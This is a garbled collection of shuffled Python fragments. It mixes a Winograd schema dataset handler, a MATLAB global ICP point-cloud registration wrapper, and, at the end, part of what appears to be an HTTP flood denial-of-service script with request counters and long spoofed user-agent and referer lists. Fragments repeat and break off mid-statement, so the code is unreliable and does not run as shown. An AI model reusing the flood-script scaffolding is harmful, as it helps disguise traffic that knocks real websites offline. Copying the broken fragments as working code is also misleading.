'manually_fixed_incorrect_sentence': row.manually_fixed_incorrect_sentence, 'correct_switched': row.manually_fixed_correct_switched, 'incorrect_switched': row.manually_fixed_incorrect_switched} dic['is_associative'] = False", "correct_sentence.replace('recieved', 'received') incorrect_sentence = incorrect_sentence.replace('recieved', 'received') rows.append([correct_sentence, incorrect_sentence]) df = pd.DataFrame(rows, columns=['correct_sentence', 'incorrect_sentence'])", "dic['incorrect_switched'] = row.incorrect_switched dic['translated'] = row.translated json_rows.append(dic) with open(WINOGRAD_SCHEMAS_FILE, 'w') as outfile: json.dump(json_rows,", "dic['is_associative'] = False if 'is_associative' not in row else row.is_associative 
dic['is_switchable'] = False", "def generate_json(df): json_rows = [] for index, row in df.iterrows(): dic = {'question_id':", "df = pd.DataFrame(rows, columns=['correct_sentence', 'incorrect_sentence', 'manually_fixed_correct_sentence', 'manually_fixed_incorrect_sentence', 'correct_switched', 'incorrect_switched', 'is_switchable', 'is_associative', 'translated']) return", "wsc_json[i]['correctness'] \\ else wsc_json[i+1]['substitution'] # noqa E226 incorrect_sentence = wsc_json[i]['substitution'] if not wsc_json[i]['correctness']", "index, row in df.iterrows(): dic = {'question_id': index, 'correct_sentence': row.correct_sentence, 'incorrect_sentence': row.incorrect_sentence, 'manually_fixed_correct_sentence':", "<filename>src/winograd_collection_manipulation/wsc_json_handler.py<gh_stars>1-10 import json import pandas as pd from src.helpers.consts import WINOGRAD_SCHEMAS_FILE, WINOGRAD_SCHEMAS_ORIGINAL_FILE def", "WINOGRAD_SCHEMAS_ORIGINAL_FILE def generate_df_from_original_json(): with open(WINOGRAD_SCHEMAS_ORIGINAL_FILE, 'r', encoding='utf-8') as fp: wsc_json = json.load(fp) rows", "row.incorrect_sentence, 'manually_fixed_correct_sentence': row.manually_fixed_correct_sentence, 'manually_fixed_incorrect_sentence': row.manually_fixed_incorrect_sentence, 'correct_switched': row.manually_fixed_correct_switched, 'incorrect_switched': row.manually_fixed_incorrect_switched} dic['is_associative'] = False if", "columns=['correct_sentence', 'incorrect_sentence']) return df def generate_df_from_json(): with open(WINOGRAD_SCHEMAS_FILE, 'r', encoding='utf-8') as fp: wsc_json", "with open(WINOGRAD_SCHEMAS_ORIGINAL_FILE, 'r', encoding='utf-8') as fp: wsc_json = json.load(fp) rows = [] for", "pd.DataFrame(rows, columns=['correct_sentence', 'incorrect_sentence']) return df def generate_df_from_json(): with open(WINOGRAD_SCHEMAS_FILE, 'r', encoding='utf-8') as fp:", "else wsc_json[i+1]['substitution'] # noqa E226 incorrect_sentence = wsc_json[i]['substitution'] if not 
wsc_json[i]['correctness'] \\ else", "'incorrect_switched': row.manually_fixed_incorrect_switched} dic['is_associative'] = False if 'is_associative' not in row else row.is_associative dic['is_switchable']", "row in df.iterrows(): dic = {'question_id': index, 'correct_sentence': row.correct_sentence, 'incorrect_sentence': row.incorrect_sentence, 'manually_fixed_correct_sentence': row.manually_fixed_correct_sentence,", "'received') rows.append([correct_sentence, incorrect_sentence]) df = pd.DataFrame(rows, columns=['correct_sentence', 'incorrect_sentence']) return df def generate_df_from_json(): with", "fp: wsc_json = json.load(fp) rows = [] for i in range(0, len(wsc_json), 2):", "dic['translated'] = row.translated json_rows.append(dic) with open(WINOGRAD_SCHEMAS_FILE, 'w') as outfile: json.dump(json_rows, outfile, ensure_ascii=False, indent=2)", "row else row.is_switchable if dic['is_switchable'] and dic['correct_switched'] == '': dic['correct_switched'] = row.correct_switched dic['incorrect_switched']", "else row.is_associative dic['is_switchable'] = False if 'is_switchable' not in row else row.is_switchable if", "df.iterrows(): dic = {'question_id': index, 'correct_sentence': row.correct_sentence, 'incorrect_sentence': row.incorrect_sentence, 'manually_fixed_correct_sentence': row.manually_fixed_correct_sentence, 'manually_fixed_incorrect_sentence': row.manually_fixed_incorrect_sentence,", "# noqa E226 correct_sentence = correct_sentence.replace('recieved', 'received') incorrect_sentence = incorrect_sentence.replace('recieved', 'received') rows.append([correct_sentence, incorrect_sentence])", "in row else row.is_switchable if dic['is_switchable'] and dic['correct_switched'] == '': dic['correct_switched'] = row.correct_switched", "and dic['correct_switched'] == '': dic['correct_switched'] = row.correct_switched dic['incorrect_switched'] = row.incorrect_switched dic['translated'] = row.translated", "= json.load(fp) rows = [] for i in range(len(wsc_json)): 
rows.append([wsc_json[i]['correct_sentence'], wsc_json[i]['incorrect_sentence'], wsc_json[i]['manually_fixed_correct_sentence'], wsc_json[i]['manually_fixed_incorrect_sentence'],", "wsc_json[i]['is_switchable'], wsc_json[i]['is_associative'], wsc_json[i]['translated']]) df = pd.DataFrame(rows, columns=['correct_sentence', 'incorrect_sentence', 'manually_fixed_correct_sentence', 'manually_fixed_incorrect_sentence', 'correct_switched', 'incorrect_switched', 'is_switchable',", "= False if 'is_associative' not in row else row.is_associative dic['is_switchable'] = False if", "json import pandas as pd from src.helpers.consts import WINOGRAD_SCHEMAS_FILE, WINOGRAD_SCHEMAS_ORIGINAL_FILE def generate_df_from_original_json(): with", "dic['correct_switched'] == '': dic['correct_switched'] = row.correct_switched dic['incorrect_switched'] = row.incorrect_switched dic['translated'] = row.translated json_rows.append(dic)", "# noqa E226 incorrect_sentence = wsc_json[i]['substitution'] if not wsc_json[i]['correctness'] \\ else wsc_json[i+1]['substitution'] #", "= json.load(fp) rows = [] for i in range(0, len(wsc_json), 2): correct_sentence =", "src.helpers.consts import WINOGRAD_SCHEMAS_FILE, WINOGRAD_SCHEMAS_ORIGINAL_FILE def generate_df_from_original_json(): with open(WINOGRAD_SCHEMAS_ORIGINAL_FILE, 'r', encoding='utf-8') as fp: wsc_json", "row.correct_switched dic['incorrect_switched'] = row.incorrect_switched dic['translated'] = row.translated json_rows.append(dic) with open(WINOGRAD_SCHEMAS_FILE, 'w') as outfile:", "def generate_df_from_original_json(): with open(WINOGRAD_SCHEMAS_ORIGINAL_FILE, 'r', encoding='utf-8') as fp: wsc_json = json.load(fp) rows =", "\\ else wsc_json[i+1]['substitution'] # noqa E226 correct_sentence = correct_sentence.replace('recieved', 'received') incorrect_sentence = incorrect_sentence.replace('recieved',", "noqa E226 incorrect_sentence = wsc_json[i]['substitution'] if not wsc_json[i]['correctness'] \\ else wsc_json[i+1]['substitution'] # noqa", 
"wsc_json[i+1]['substitution'] # noqa E226 correct_sentence = correct_sentence.replace('recieved', 'received') incorrect_sentence = incorrect_sentence.replace('recieved', 'received') rows.append([correct_sentence,", "= [] for i in range(len(wsc_json)): rows.append([wsc_json[i]['correct_sentence'], wsc_json[i]['incorrect_sentence'], wsc_json[i]['manually_fixed_correct_sentence'], wsc_json[i]['manually_fixed_incorrect_sentence'], wsc_json[i]['correct_switched'], wsc_json[i]['incorrect_switched'], wsc_json[i]['is_switchable'],", "pd from src.helpers.consts import WINOGRAD_SCHEMAS_FILE, WINOGRAD_SCHEMAS_ORIGINAL_FILE def generate_df_from_original_json(): with open(WINOGRAD_SCHEMAS_ORIGINAL_FILE, 'r', encoding='utf-8') as", "return df def generate_json(df): json_rows = [] for index, row in df.iterrows(): dic", "'manually_fixed_correct_sentence', 'manually_fixed_incorrect_sentence', 'correct_switched', 'incorrect_switched', 'is_switchable', 'is_associative', 'translated']) return df def generate_json(df): json_rows =", "incorrect_sentence = wsc_json[i]['substitution'] if not wsc_json[i]['correctness'] \\ else wsc_json[i+1]['substitution'] # noqa E226 correct_sentence", "columns=['correct_sentence', 'incorrect_sentence', 'manually_fixed_correct_sentence', 'manually_fixed_incorrect_sentence', 'correct_switched', 'incorrect_switched', 'is_switchable', 'is_associative', 'translated']) return df def generate_json(df):", "'is_switchable', 'is_associative', 'translated']) return df def generate_json(df): json_rows = [] for index, row", "'received') incorrect_sentence = incorrect_sentence.replace('recieved', 'received') rows.append([correct_sentence, incorrect_sentence]) df = pd.DataFrame(rows, columns=['correct_sentence', 'incorrect_sentence']) return", "as pd from src.helpers.consts import WINOGRAD_SCHEMAS_FILE, WINOGRAD_SCHEMAS_ORIGINAL_FILE def generate_df_from_original_json(): with open(WINOGRAD_SCHEMAS_ORIGINAL_FILE, 'r', encoding='utf-8')", "rows = [] for i in 
range(len(wsc_json)): rows.append([wsc_json[i]['correct_sentence'], wsc_json[i]['incorrect_sentence'], wsc_json[i]['manually_fixed_correct_sentence'], wsc_json[i]['manually_fixed_incorrect_sentence'], wsc_json[i]['correct_switched'], wsc_json[i]['incorrect_switched'],", "range(0, len(wsc_json), 2): correct_sentence = wsc_json[i]['substitution'] if wsc_json[i]['correctness'] \\ else wsc_json[i+1]['substitution'] # noqa", "dic['is_switchable'] = False if 'is_switchable' not in row else row.is_switchable if dic['is_switchable'] and", "not wsc_json[i]['correctness'] \\ else wsc_json[i+1]['substitution'] # noqa E226 correct_sentence = correct_sentence.replace('recieved', 'received') incorrect_sentence", "wsc_json[i]['correctness'] \\ else wsc_json[i+1]['substitution'] # noqa E226 correct_sentence = correct_sentence.replace('recieved', 'received') incorrect_sentence =", "else row.is_switchable if dic['is_switchable'] and dic['correct_switched'] == '': dic['correct_switched'] = row.correct_switched dic['incorrect_switched'] =", "'': dic['correct_switched'] = row.correct_switched dic['incorrect_switched'] = row.incorrect_switched dic['translated'] = row.translated json_rows.append(dic) with open(WINOGRAD_SCHEMAS_FILE,", "'translated']) return df def generate_json(df): json_rows = [] for index, row in df.iterrows():", "row.correct_sentence, 'incorrect_sentence': row.incorrect_sentence, 'manually_fixed_correct_sentence': row.manually_fixed_correct_sentence, 'manually_fixed_incorrect_sentence': row.manually_fixed_incorrect_sentence, 'correct_switched': row.manually_fixed_correct_switched, 'incorrect_switched': row.manually_fixed_incorrect_switched} dic['is_associative'] =", "dic['correct_switched'] = row.correct_switched dic['incorrect_switched'] = row.incorrect_switched dic['translated'] = row.translated json_rows.append(dic) with open(WINOGRAD_SCHEMAS_FILE, 'w')", "as fp: wsc_json = json.load(fp) rows = [] for i in range(len(wsc_json)): 
rows.append([wsc_json[i]['correct_sentence']," ]
[ "i in range(mat['R'].shape[0])] print(len(actualHs),actualHs[0].shape) for i in range(mat['R'].shape[0]): for k in range(mat['R'].shape[1]-1): actualHs[i]", "np.dot(Hs[i][k] , actualHs[i]) print(actualHs[0].shape) registeredModel = [] #registeredmodel[0][x][0] cointains the array of points", "matlab.engine import numpy as np import scipy.io def CalculateGlobICP(): eng = matlab.engine.start_matlab() #create", "= [[] for i in range(mat['R'].shape[0])] for i in range(mat['R'].shape[0]): #cuz last step", "k in range(mat['R'].shape[1]-1): Hs[i].append(matmanip.Rt2Homo(mat['R'][i,k],np.squeeze(mat['t'][i,k]))) actualHs = [np.eye(4) for i in range(mat['R'].shape[0])] print(len(actualHs),actualHs[0].shape) for", "* import matlab.engine import numpy as np import scipy.io def CalculateGlobICP(): eng =", "#50 eng.globalProcrustesWrapper(modelpcs,5, nargout=0) #sending input to the function eng.cd(\"./GlobalProcrustesICP\") return RetrieveGlobICPOutput() def RetrieveGlobICPOutput(outputpath='./GlobalProcrustesICP/globalIcpOut.mat'):", "numpy arrays #50 eng.globalProcrustesWrapper(modelpcs,5, nargout=0) #sending input to the function eng.cd(\"./GlobalProcrustesICP\") return RetrieveGlobICPOutput()", "registeredModel = [] #registeredmodel[0][x][0] cointains the array of points of pointcloud x for", ", actualHs[i]) print(actualHs[0].shape) registeredModel = [] #registeredmodel[0][x][0] cointains the array of points of", "range(mat['R'].shape[0]): for k in range(mat['R'].shape[1]-1): actualHs[i] = np.dot(Hs[i][k] , actualHs[i]) print(actualHs[0].shape) registeredModel =", "RetrieveGlobICPOutput() def RetrieveGlobICPOutput(outputpath='./GlobalProcrustesICP/globalIcpOut.mat'): mat = scipy.io.loadmat(outputpath) print(mat['R'].shape) #first dimension is number of cameras,", "numpy as np import scipy.io def CalculateGlobICP(): eng = matlab.engine.start_matlab() #create a list", "steps Hs = [[] for i in range(mat['R'].shape[0])] for i in range(mat['R'].shape[0]): #cuz", "function 
eng.cd(\"./GlobalProcrustesICP\") return RetrieveGlobICPOutput() def RetrieveGlobICPOutput(outputpath='./GlobalProcrustesICP/globalIcpOut.mat'): mat = scipy.io.loadmat(outputpath) print(mat['R'].shape) #first dimension is", "as np import scipy.io from libs import * import matlab.engine import numpy as", "import matlab.engine import numpy as np import scipy.io def CalculateGlobICP(): eng = matlab.engine.start_matlab()", "list of numpy arrays #50 eng.globalProcrustesWrapper(modelpcs,5, nargout=0) #sending input to the function eng.cd(\"./GlobalProcrustesICP\")", "actualHs[i] = np.dot(Hs[i][k] , actualHs[i]) print(actualHs[0].shape) registeredModel = [] #registeredmodel[0][x][0] cointains the array", "print(mat['R'].shape) #first dimension is number of cameras, second is number of steps Hs", "number of steps Hs = [[] for i in range(mat['R'].shape[0])] for i in", "#create a list of numpy arrays #50 eng.globalProcrustesWrapper(modelpcs,5, nargout=0) #sending input to the", "print(actualHs[0].shape) registeredModel = [] #registeredmodel[0][x][0] cointains the array of points of pointcloud x", "actualHs[i]) print(actualHs[0].shape) registeredModel = [] #registeredmodel[0][x][0] cointains the array of points of pointcloud", "def RetrieveGlobICPOutput(outputpath='./GlobalProcrustesICP/globalIcpOut.mat'): mat = scipy.io.loadmat(outputpath) print(mat['R'].shape) #first dimension is number of cameras, second", "i in range(mat['R'].shape[0]): #cuz last step returns no rotation for k in range(mat['R'].shape[1]-1):", "the function eng.cd(\"./GlobalProcrustesICP\") return RetrieveGlobICPOutput() def RetrieveGlobICPOutput(outputpath='./GlobalProcrustesICP/globalIcpOut.mat'): mat = scipy.io.loadmat(outputpath) print(mat['R'].shape) #first dimension", "import sys, os sys.path.append('./libs') import numpy as np import scipy.io from libs import", "#cuz last step returns no rotation for k in range(mat['R'].shape[1]-1): 
Hs[i].append(matmanip.Rt2Homo(mat['R'][i,k],np.squeeze(mat['t'][i,k]))) actualHs =", "in range(mat['R'].shape[1]-1): actualHs[i] = np.dot(Hs[i][k] , actualHs[i]) print(actualHs[0].shape) registeredModel = [] #registeredmodel[0][x][0] cointains", "dimension is number of cameras, second is number of steps Hs = [[]", "k in range(mat['R'].shape[1]-1): actualHs[i] = np.dot(Hs[i][k] , actualHs[i]) print(actualHs[0].shape) registeredModel = [] #registeredmodel[0][x][0]", "eng.globalProcrustesWrapper(modelpcs,5, nargout=0) #sending input to the function eng.cd(\"./GlobalProcrustesICP\") return RetrieveGlobICPOutput() def RetrieveGlobICPOutput(outputpath='./GlobalProcrustesICP/globalIcpOut.mat'): mat", "in range(mat['R'].shape[0]): for k in range(mat['R'].shape[1]-1): actualHs[i] = np.dot(Hs[i][k] , actualHs[i]) print(actualHs[0].shape) registeredModel", "for i in range(len(actualHs)): registeredModel.append(print(mat['registeredModel'][0][i][0])) #for i in range() # Rt2Homo(R=None,t=None) return actualHs,registeredModel", "in range(mat['R'].shape[0]): #cuz last step returns no rotation for k in range(mat['R'].shape[1]-1): Hs[i].append(matmanip.Rt2Homo(mat['R'][i,k],np.squeeze(mat['t'][i,k])))", "the array of points of pointcloud x for i in range(len(actualHs)): registeredModel.append(print(mat['registeredModel'][0][i][0])) #for", "of numpy arrays #50 eng.globalProcrustesWrapper(modelpcs,5, nargout=0) #sending input to the function eng.cd(\"./GlobalProcrustesICP\") return", "array of points of pointcloud x for i in range(len(actualHs)): registeredModel.append(print(mat['registeredModel'][0][i][0])) #for i", "eng = matlab.engine.start_matlab() #create a list of numpy arrays #50 eng.globalProcrustesWrapper(modelpcs,5, nargout=0) #sending", "CalculateGlobICP(): eng = matlab.engine.start_matlab() #create a list of numpy arrays #50 eng.globalProcrustesWrapper(modelpcs,5, nargout=0)", "cameras, second is number of steps Hs = [[] for i in range(mat['R'].shape[0])]", "for i in 
range(mat['R'].shape[0]): #cuz last step returns no rotation for k in", "RetrieveGlobICPOutput(outputpath='./GlobalProcrustesICP/globalIcpOut.mat'): mat = scipy.io.loadmat(outputpath) print(mat['R'].shape) #first dimension is number of cameras, second is", "actualHs = [np.eye(4) for i in range(mat['R'].shape[0])] print(len(actualHs),actualHs[0].shape) for i in range(mat['R'].shape[0]): for", "mat = scipy.io.loadmat(outputpath) print(mat['R'].shape) #first dimension is number of cameras, second is number", "from libs import * import matlab.engine import numpy as np import scipy.io def", "Hs = [[] for i in range(mat['R'].shape[0])] for i in range(mat['R'].shape[0]): #cuz last", "no rotation for k in range(mat['R'].shape[1]-1): Hs[i].append(matmanip.Rt2Homo(mat['R'][i,k],np.squeeze(mat['t'][i,k]))) actualHs = [np.eye(4) for i in", "i in range(mat['R'].shape[0])] for i in range(mat['R'].shape[0]): #cuz last step returns no rotation", "rotation for k in range(mat['R'].shape[1]-1): Hs[i].append(matmanip.Rt2Homo(mat['R'][i,k],np.squeeze(mat['t'][i,k]))) actualHs = [np.eye(4) for i in range(mat['R'].shape[0])]", "for k in range(mat['R'].shape[1]-1): Hs[i].append(matmanip.Rt2Homo(mat['R'][i,k],np.squeeze(mat['t'][i,k]))) actualHs = [np.eye(4) for i in range(mat['R'].shape[0])] print(len(actualHs),actualHs[0].shape)", "is number of cameras, second is number of steps Hs = [[] for", "number of cameras, second is number of steps Hs = [[] for i", "libs import * import matlab.engine import numpy as np import scipy.io def CalculateGlobICP():", "in range(mat['R'].shape[1]-1): Hs[i].append(matmanip.Rt2Homo(mat['R'][i,k],np.squeeze(mat['t'][i,k]))) actualHs = [np.eye(4) for i in range(mat['R'].shape[0])] print(len(actualHs),actualHs[0].shape) for i", "sys.path.append('./libs') import numpy as np import scipy.io from libs import * import matlab.engine", "as np import scipy.io def CalculateGlobICP(): eng = matlab.engine.start_matlab() #create a list of", "= [np.eye(4) for i in 
range(mat['R'].shape[0])] print(len(actualHs),actualHs[0].shape) for i in range(mat['R'].shape[0]): for k", "scipy.io def CalculateGlobICP(): eng = matlab.engine.start_matlab() #create a list of numpy arrays #50", "import numpy as np import scipy.io def CalculateGlobICP(): eng = matlab.engine.start_matlab() #create a", "scipy.io from libs import * import matlab.engine import numpy as np import scipy.io", "for k in range(mat['R'].shape[1]-1): actualHs[i] = np.dot(Hs[i][k] , actualHs[i]) print(actualHs[0].shape) registeredModel = []", "cointains the array of points of pointcloud x for i in range(len(actualHs)): registeredModel.append(print(mat['registeredModel'][0][i][0]))", "numpy as np import scipy.io from libs import * import matlab.engine import numpy", "range(mat['R'].shape[0])] print(len(actualHs),actualHs[0].shape) for i in range(mat['R'].shape[0]): for k in range(mat['R'].shape[1]-1): actualHs[i] = np.dot(Hs[i][k]", "points of pointcloud x for i in range(len(actualHs)): registeredModel.append(print(mat['registeredModel'][0][i][0])) #for i in range()", "#registeredmodel[0][x][0] cointains the array of points of pointcloud x for i in range(len(actualHs)):", "in range(mat['R'].shape[0])] print(len(actualHs),actualHs[0].shape) for i in range(mat['R'].shape[0]): for k in range(mat['R'].shape[1]-1): actualHs[i] =", "range(mat['R'].shape[1]-1): actualHs[i] = np.dot(Hs[i][k] , actualHs[i]) print(actualHs[0].shape) registeredModel = [] #registeredmodel[0][x][0] cointains the", "of pointcloud x for i in range(len(actualHs)): registeredModel.append(print(mat['registeredModel'][0][i][0])) #for i in range() #", "is number of steps Hs = [[] for i in range(mat['R'].shape[0])] for i", "arrays #50 eng.globalProcrustesWrapper(modelpcs,5, nargout=0) #sending input to the function eng.cd(\"./GlobalProcrustesICP\") return RetrieveGlobICPOutput() def", "for i in range(mat['R'].shape[0]): for k in range(mat['R'].shape[1]-1): actualHs[i] = np.dot(Hs[i][k] , actualHs[i])", 
"range(mat['R'].shape[1]-1): Hs[i].append(matmanip.Rt2Homo(mat['R'][i,k],np.squeeze(mat['t'][i,k]))) actualHs = [np.eye(4) for i in range(mat['R'].shape[0])] print(len(actualHs),actualHs[0].shape) for i in", "print(len(actualHs),actualHs[0].shape) for i in range(mat['R'].shape[0]): for k in range(mat['R'].shape[1]-1): actualHs[i] = np.dot(Hs[i][k] ,", "in range(mat['R'].shape[0])] for i in range(mat['R'].shape[0]): #cuz last step returns no rotation for", "#sending input to the function eng.cd(\"./GlobalProcrustesICP\") return RetrieveGlobICPOutput() def RetrieveGlobICPOutput(outputpath='./GlobalProcrustesICP/globalIcpOut.mat'): mat = scipy.io.loadmat(outputpath)", "range(mat['R'].shape[0])] for i in range(mat['R'].shape[0]): #cuz last step returns no rotation for k", "range(mat['R'].shape[0]): #cuz last step returns no rotation for k in range(mat['R'].shape[1]-1): Hs[i].append(matmanip.Rt2Homo(mat['R'][i,k],np.squeeze(mat['t'][i,k]))) actualHs", "matlab.engine.start_matlab() #create a list of numpy arrays #50 eng.globalProcrustesWrapper(modelpcs,5, nargout=0) #sending input to", "import numpy as np import scipy.io from libs import * import matlab.engine import", "nargout=0) #sending input to the function eng.cd(\"./GlobalProcrustesICP\") return RetrieveGlobICPOutput() def RetrieveGlobICPOutput(outputpath='./GlobalProcrustesICP/globalIcpOut.mat'): mat =", "return RetrieveGlobICPOutput() def RetrieveGlobICPOutput(outputpath='./GlobalProcrustesICP/globalIcpOut.mat'): mat = scipy.io.loadmat(outputpath) print(mat['R'].shape) #first dimension is number of", "a list of numpy arrays #50 eng.globalProcrustesWrapper(modelpcs,5, nargout=0) #sending input to the function", "x for i in range(len(actualHs)): registeredModel.append(print(mat['registeredModel'][0][i][0])) #for i in range() # Rt2Homo(R=None,t=None) return", "of cameras, second is number of steps Hs = [[] for i in", "def CalculateGlobICP(): eng = matlab.engine.start_matlab() #create a list of numpy arrays #50 
eng.globalProcrustesWrapper(modelpcs,5,", "for i in range(mat['R'].shape[0])] for i in range(mat['R'].shape[0]): #cuz last step returns no", "of points of pointcloud x for i in range(len(actualHs)): registeredModel.append(print(mat['registeredModel'][0][i][0])) #for i in", "= np.dot(Hs[i][k] , actualHs[i]) print(actualHs[0].shape) registeredModel = [] #registeredmodel[0][x][0] cointains the array of", "step returns no rotation for k in range(mat['R'].shape[1]-1): Hs[i].append(matmanip.Rt2Homo(mat['R'][i,k],np.squeeze(mat['t'][i,k]))) actualHs = [np.eye(4) for", "np import scipy.io from libs import * import matlab.engine import numpy as np", "= [] #registeredmodel[0][x][0] cointains the array of points of pointcloud x for i", "import scipy.io from libs import * import matlab.engine import numpy as np import", "Hs[i].append(matmanip.Rt2Homo(mat['R'][i,k],np.squeeze(mat['t'][i,k]))) actualHs = [np.eye(4) for i in range(mat['R'].shape[0])] print(len(actualHs),actualHs[0].shape) for i in range(mat['R'].shape[0]):", "import scipy.io def CalculateGlobICP(): eng = matlab.engine.start_matlab() #create a list of numpy arrays", "sys, os sys.path.append('./libs') import numpy as np import scipy.io from libs import *", "returns no rotation for k in range(mat['R'].shape[1]-1): Hs[i].append(matmanip.Rt2Homo(mat['R'][i,k],np.squeeze(mat['t'][i,k]))) actualHs = [np.eye(4) for i", "import * import matlab.engine import numpy as np import scipy.io def CalculateGlobICP(): eng", "[[] for i in range(mat['R'].shape[0])] for i in range(mat['R'].shape[0]): #cuz last step returns", "scipy.io.loadmat(outputpath) print(mat['R'].shape) #first dimension is number of cameras, second is number of steps", "[] #registeredmodel[0][x][0] cointains the array of points of pointcloud x for i in", "= scipy.io.loadmat(outputpath) print(mat['R'].shape) #first dimension is number of cameras, second is number of", "to the function eng.cd(\"./GlobalProcrustesICP\") return RetrieveGlobICPOutput() def 
RetrieveGlobICPOutput(outputpath='./GlobalProcrustesICP/globalIcpOut.mat'): mat = scipy.io.loadmat(outputpath) print(mat['R'].shape) #first", "second is number of steps Hs = [[] for i in range(mat['R'].shape[0])] for", "of steps Hs = [[] for i in range(mat['R'].shape[0])] for i in range(mat['R'].shape[0]):", "eng.cd(\"./GlobalProcrustesICP\") return RetrieveGlobICPOutput() def RetrieveGlobICPOutput(outputpath='./GlobalProcrustesICP/globalIcpOut.mat'): mat = scipy.io.loadmat(outputpath) print(mat['R'].shape) #first dimension is number", "#first dimension is number of cameras, second is number of steps Hs =", "np import scipy.io def CalculateGlobICP(): eng = matlab.engine.start_matlab() #create a list of numpy", "last step returns no rotation for k in range(mat['R'].shape[1]-1): Hs[i].append(matmanip.Rt2Homo(mat['R'][i,k],np.squeeze(mat['t'][i,k]))) actualHs = [np.eye(4)", "pointcloud x for i in range(len(actualHs)): registeredModel.append(print(mat['registeredModel'][0][i][0])) #for i in range() # Rt2Homo(R=None,t=None)", "input to the function eng.cd(\"./GlobalProcrustesICP\") return RetrieveGlobICPOutput() def RetrieveGlobICPOutput(outputpath='./GlobalProcrustesICP/globalIcpOut.mat'): mat = scipy.io.loadmat(outputpath) print(mat['R'].shape)", "[np.eye(4) for i in range(mat['R'].shape[0])] print(len(actualHs),actualHs[0].shape) for i in range(mat['R'].shape[0]): for k in", "i in range(mat['R'].shape[0]): for k in range(mat['R'].shape[1]-1): actualHs[i] = np.dot(Hs[i][k] , actualHs[i]) print(actualHs[0].shape)", "os sys.path.append('./libs') import numpy as np import scipy.io from libs import * import", "= matlab.engine.start_matlab() #create a list of numpy arrays #50 eng.globalProcrustesWrapper(modelpcs,5, nargout=0) #sending input", "for i in range(mat['R'].shape[0])] print(len(actualHs),actualHs[0].shape) for i in range(mat['R'].shape[0]): for k in range(mat['R'].shape[1]-1):" ]
[ "headers_useragents=[] headers_referers=[] request_counter=0 flag=0 safe=0 def inc_counter(): global request_counter request_counter+=1 def set_flag(val): global", "1.0') headers_useragents.append(':robot/1.0 (linux) ( admin e-mail: undefined http://www.neofonie.de/loesungen/search/robot.html )') headers_useragents.append('A-Online Search') headers_useragents.append('A1 Keyword", "headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://www.ask.com/web?q=')", "/|-._: : | \\ \\ / / :_| ;`-._; __..--'; : : /", "libwww-perl/5.46') headers_useragents.append('Alligator 1.31 (www.nearsoftware.com)') headers_useragents.append('Allrati/1.1 (+)') headers_useragents.append('AltaVista Intranet V2.0 AVS EVAL <EMAIL>') headers_useragents.append('AltaVista", "headers_useragents.append('Version/4.0 Mobile Safari/533.1') headers_useragents.append('Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36')", "Mobile Safari/533.1') headers_useragents.append('Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36') headers_useragents.append('Mozilla/5.0", "better indexing on www.axmo.com search engine.') 
headers_useragents.append('Azureus 2.x.x.x') headers_useragents.append('BabalooSpider/1.3 (BabalooSpider; http://www.babaloo.si; <EMAIL>)') headers_useragents.append('BaboomBot/1.x.x", "Nexus 7 Build/JRO03D)') headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux; U; Android", "evreka.com <EMAIL>') headers_useragents.append('AltaVista V2.0B <EMAIL>') headers_useragents.append('amaya/x.xx libwww/x.x.x') headers_useragents.append('AmfibiBOT') headers_useragents.append('Amfibibot/0.06 (Amfibi Web Search; http://www.amfibi.com;", "headers_useragents.append('Azureus 2.x.x.x') headers_useragents.append('BabalooSpider/1.3 (BabalooSpider; http://www.babaloo.si; <EMAIL>)') headers_useragents.append('BaboomBot/1.x.x (+http://www.baboom.us)') headers_useragents.append('BackStreet Browser 3.x') headers_useragents.append('BaiduImagespider+(+http://www.baidu.jp/search/s308.html)') headers_useragents.append('BaiDuSpider')", "Gecko/20060610') headers_useragents.append('Minimo/0.016') headers_useragents.append('OPWV-SDK UP.Browser/7.0.2.3.119 (GUI) MMP/2.0 Push/PO') headers_useragents.append('UP.Browser/6.1.0.1.140 (Google CHTML Proxy/1.0)') headers_useragents.append('Mozilla/4.0 (compatible;", "S Build/JRO03E)') headers_useragents.append('AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.2.1;", "/ / / / / ~ ~~ ~~~ ~~~ ~~~ ~~~ \"\"\" #http", "like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.1.2; en-gb; GT-I9300 Build/JZO54K)') headers_useragents.append('AppleWebKit/534.30", "1.31 (www.nearsoftware.com)') headers_useragents.append('Allrati/1.1 (+)') headers_useragents.append('AltaVista Intranet V2.0 AVS EVAL <EMAIL>') headers_useragents.append('AltaVista Intranet V2.0", "X') 
